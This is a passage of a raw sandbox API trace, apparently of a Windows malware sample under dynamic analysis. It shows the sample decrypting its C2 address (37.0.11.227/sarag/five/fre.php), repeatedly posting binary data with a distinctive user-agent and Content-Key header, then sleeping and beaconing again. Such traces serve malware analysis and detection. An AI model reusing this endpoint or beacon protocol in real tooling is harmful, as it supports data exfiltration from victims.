Flags=0x0, Size=0xf4) returned 0x6ad508 [0264.201] GetProcessHeap () returned 0x690000 [0264.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.201] send (s=0x7ac, buf=0x6ad508*, len=242, flags=0) returned 242 [0264.202] send (s=0x7ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0264.202] GetProcessHeap () returned 0x690000 [0264.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0264.202] recv (in: s=0x7ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0264.269] GetProcessHeap () returned 0x690000 [0264.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0264.272] GetProcessHeap () returned 0x690000 [0264.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0264.278] GetProcessHeap () returned 0x690000 [0264.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0264.279] GetProcessHeap () returned 0x690000 [0264.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0264.279] closesocket (s=0x7ac) returned 0 [0264.280] GetProcessHeap () returned 0x690000 [0264.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0264.280] GetProcessHeap () returned 0x690000 [0264.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.280] GetProcessHeap () returned 0x690000 [0264.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.281] GetProcessHeap () returned 0x690000 [0264.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0264.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x155c) returned 0x7ac [0264.284] Sleep (dwMilliseconds=0xea60) [0264.286] GetProcessHeap () returned 0x690000 [0264.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0264.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.296] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0264.305] GetProcessHeap () returned 0x690000 [0264.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0264.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.312] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0264.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.313] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.315] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.315] GetProcessHeap () returned 0x690000 [0264.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0264.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.317] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0264.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.318] CryptDestroyKey (hKey=0x69d628) returned 1 [0264.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.320] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0264.320] GetProcessHeap () returned 0x690000 [0264.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.321] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.322] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.324] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.325] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.325] GetProcessHeap () returned 0x690000 [0264.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0264.325] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.326] GetProcessHeap () returned 0x690000 [0264.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0264.326] GetProcessHeap () returned 0x690000 [0264.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.327] GetProcessHeap () returned 0x690000 [0264.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.327] GetProcessHeap () returned 0x690000 [0264.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0264.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.329] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.334] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0264.344] GetProcessHeap () returned 0x690000 [0264.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0264.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.346] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0264.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.348] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.349] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.349] GetProcessHeap () returned 0x690000 [0264.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0264.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.351] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0264.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.352] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0264.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.353] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0264.353] GetProcessHeap () returned 0x690000 [0264.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.354] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0264.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0264.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.357] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0264.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.359] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0264.359] GetProcessHeap () returned 0x690000 [0264.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0264.359] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0264.359] GetProcessHeap () returned 0x690000 [0264.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0264.359] socket (af=2, type=1, protocol=6) returned 0x7b0 [0264.359] connect (s=0x7b0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0264.382] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0264.382] GetProcessHeap () returned 0x690000 [0264.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0264.383] GetProcessHeap () returned 0x690000 [0264.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0264.383] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.385] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.385] GetProcessHeap () returned 0x690000 [0264.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0264.385] GetProcessHeap () returned 0x690000 [0264.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.385] GetProcessHeap () returned 0x690000 [0264.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0264.386] GetProcessHeap () returned 0x690000 [0264.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0264.387] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.387] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.388] GetProcessHeap () returned 0x690000 [0264.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0264.388] GetProcessHeap () returned 0x690000 [0264.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.388] send (s=0x7b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0264.389] send (s=0x7b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0264.389] GetProcessHeap () returned 0x690000 [0264.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0264.389] recv (in: s=0x7b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0264.464] GetProcessHeap () returned 0x690000 [0264.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0264.464] GetProcessHeap () returned 0x690000 [0264.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.465] GetProcessHeap () returned 0x690000 [0264.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0264.466] GetProcessHeap () returned 0x690000 [0264.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0264.467] closesocket (s=0x7b0) returned 0 [0264.467] GetProcessHeap () returned 0x690000 [0264.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0264.467] GetProcessHeap () returned 0x690000 [0264.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.468] GetProcessHeap () returned 0x690000 [0264.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0264.468] GetProcessHeap () returned 0x690000 [0264.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0264.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1560) returned 0x7b0 [0264.471] Sleep (dwMilliseconds=0xea60) [0264.475] GetProcessHeap () returned 0x690000 [0264.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0264.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.476] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0264.494] GetProcessHeap () returned 0x690000 [0264.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0264.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.519] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0264.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.521] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.522] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.522] GetProcessHeap () returned 0x690000 [0264.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0264.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.524] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0264.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.525] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0264.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.525] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0264.525] GetProcessHeap () returned 0x690000 [0264.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.526] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.527] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.531] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.532] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.532] GetProcessHeap () returned 0x690000 [0264.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0264.532] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.532] GetProcessHeap () returned 0x690000 [0264.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0264.533] GetProcessHeap () returned 0x690000 [0264.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.533] GetProcessHeap () returned 0x690000 [0264.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0264.534] GetProcessHeap () returned 0x690000 [0264.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0264.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.535] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.544] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0264.556] GetProcessHeap () returned 0x690000 [0264.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0264.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.557] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0264.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.558] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.560] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.560] GetProcessHeap () returned 0x690000 [0264.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0264.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.562] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0264.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.563] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0264.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.566] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0264.566] GetProcessHeap () returned 0x690000 [0264.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.567] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0264.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.571] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0264.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.572] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0264.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.574] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0264.574] GetProcessHeap () returned 0x690000 [0264.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0264.574] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0264.574] GetProcessHeap () returned 0x690000 [0264.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0264.574] socket (af=2, type=1, protocol=6) returned 0x7b4 [0264.574] connect (s=0x7b4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0264.601] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0264.601] GetProcessHeap () returned 0x690000 [0264.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0264.601] GetProcessHeap () returned 0x690000 [0264.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0264.605] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.606] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.606] GetProcessHeap () returned 0x690000 [0264.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0264.606] GetProcessHeap () returned 0x690000 [0264.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.607] GetProcessHeap () returned 0x690000 [0264.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0264.607] GetProcessHeap () returned 0x690000 [0264.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0264.608] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.608] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.609] GetProcessHeap () returned 0x690000 [0264.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0264.609] GetProcessHeap () returned 0x690000 [0264.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.609] send (s=0x7b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0264.610] send (s=0x7b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0264.610] GetProcessHeap () returned 0x690000 [0264.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0264.610] recv (in: s=0x7b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0264.693] GetProcessHeap () returned 0x690000 [0264.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0264.693] GetProcessHeap () returned 0x690000 [0264.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0264.694] GetProcessHeap () returned 0x690000 [0264.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0264.694] GetProcessHeap () returned 0x690000 [0264.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0264.695] closesocket (s=0x7b4) returned 0 [0264.695] GetProcessHeap () returned 0x690000 